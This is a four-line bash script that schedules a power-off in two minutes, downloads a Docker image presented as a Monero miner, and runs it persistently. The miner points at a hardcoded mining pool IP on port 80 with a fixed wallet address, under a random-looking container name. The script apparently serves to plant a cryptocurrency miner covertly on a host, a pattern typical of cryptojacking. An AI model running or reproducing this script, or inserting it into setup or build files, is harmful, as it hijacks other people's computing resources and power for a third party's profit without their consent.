#! /bin/bash
sudo shutdown -P +2
sudo docker pull pmietlicki/monero-miner
sudo docker run -itd --restart=always -e POOL_URL=45.76.89.70:80 -e POOL_USER=4846S5hnZQLNUFLWAak9Aj2bTgpTEQY5N8aYMk2h26kNaMG59iNE3E3G6kxUCm5Y34jQvsH5GPH4XZ34yWpYM63f1SDkuQr --name aqmjnlazlam pmietlicki/monero-miner
